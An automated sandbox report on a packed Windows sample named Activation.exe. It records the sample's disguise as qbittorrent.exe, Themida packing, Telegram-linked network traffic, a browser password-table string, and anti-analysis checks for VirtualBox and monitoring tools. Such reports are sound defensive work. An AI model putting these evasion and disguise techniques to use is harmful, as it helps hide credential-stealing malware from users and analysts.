            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/TheDyer
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/freakcodingspot
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/webster480
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.9:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2

            System Summary

            barindex
            Source: Activation.exeStatic PE information: section name:
            Source: Activation.exeStatic PE information: section name:
            Source: Activation.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C940E80_2_00C940E8
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C9D8F00_2_00C9D8F0
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C938180_2_00C93818
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C9A4400_2_00C9A440
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C9D8E00_2_00C9D8E0
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C934D00_2_00C934D0
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_05ABEF080_2_05ABEF08
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_05ABEF180_2_05ABEF18
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_05AB98370_2_05AB9837
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_05AB98480_2_05AB9848
            Source: C:\Users\user\Desktop\Activation.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432
            Source: Activation.exeBinary or memory string: OriginalFilename vs Activation.exe
            Source: Activation.exe, 00000000.00000000.1355318608.0000000000D06000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameqbittorrent.exe8 vs Activation.exe
            Source: Activation.exe, 00000000.00000002.1650676845.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameqbittorrent.exe8 vs Activation.exe
            Source: Activation.exe, 00000000.00000002.1645685696.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Activation.exe
            Source: Activation.exeBinary or memory string: OriginalFilenameqbittorrent.exe8 vs Activation.exe
            Source: Activation.exeStatic PE information: Section: ZLIB complexity 1.0004525674499565
            Source: Activation.exeStatic PE information: Section: ZLIB complexity 1.0165413533834586
            Source: Activation.exeStatic PE information: Section: ZLIB complexity 1.6
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@2/2
            Source: C:\Users\user\Desktop\Activation.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Activation.exeMutant created: \Sessions\1\BaseNamedObjects\Pekorojasecopycemonuxazivopenos
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7588
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\eb768719-ba71-4f34-a6c9-73e42f7258aeJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Activation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003704000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Activation.exeReversingLabs: Detection: 42%
            Source: unknownProcess created: C:\Users\user\Desktop\Activation.exe "C:\Users\user\Desktop\Activation.exe"
            Source: C:\Users\user\Desktop\Activation.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Activation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Activation.exeStatic file information: File size 3361979 > 1048576
            Source: Activation.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x3258bb
            Source: Binary string: System.Xml.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: HPHo,C:\Windows\System.pdb source: Activation.exe, 00000000.00000002.1645404055.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Configuration.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdb source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbL0Tw# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbTV source: Activation.exe, 00000000.00000002.1645685696.0000000000A85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb\ source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb;( source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Activation.exe, 00000000.00000002.1650751818.0000000000D08000.00000040.00000001.01000000.00000003.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdbh source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\Activation.exeUnpacked PE file: 0.2.Activation.exe.ce0000.0.unpack :ER; :R; :R;.imports:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
            Source: Activation.exeStatic PE information: section name:
            Source: Activation.exeStatic PE information: section name:
            Source: Activation.exeStatic PE information: section name:
            Source: Activation.exeStatic PE information: section name: .imports
            Source: Activation.exeStatic PE information: section name: .themida
            Source: Activation.exeStatic PE information: section name: .boot
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C909D8 push cs; retf 0_2_00C909DA
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C909D0 push cs; retf 0_2_00C909D2
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C95178 push eax; mov dword ptr [esp], ecx0_2_00C9518C
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C90AA8 push cs; retf 0_2_00C90AAA
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C90A08 push cs; retf 0_2_00C90AA2
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C90A00 push cs; retf 0_2_00C90A02
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C9BA21 pushfd ; retf 0_2_00C9BA22
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92A39 push ds; retf 0_2_00C92A3A
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92BF8 push ds; retf 0_2_00C92BFA
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92BF5 push ds; retf 0_2_00C92BF6
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92B21 push ds; retf 0_2_00C92B22
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C94C50 pushad ; retf 0_2_00C94C51
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92D2D push ds; retf 0_2_00C92D2E
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92D31 push ds; retf 0_2_00C92D32
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92E84 push ds; retf 0_2_00C92E86
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92E87 push ds; retf 0_2_00C92E8A
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92FBD push ds; retf 0_2_00C92FBE
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_00C92FBF push ds; retf 0_2_00C92FC2
            Source: C:\Users\user\Desktop\Activation.exeCode function: 0_2_05AB6EA3 pushad ; ret 0_2_05AB6EA9
            Source: Activation.exeStatic PE information: section name: entropy: 7.9859308748687345

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\Activation.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Activation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Activation.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\Activation.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeMemory allocated: 3470000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Activation.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
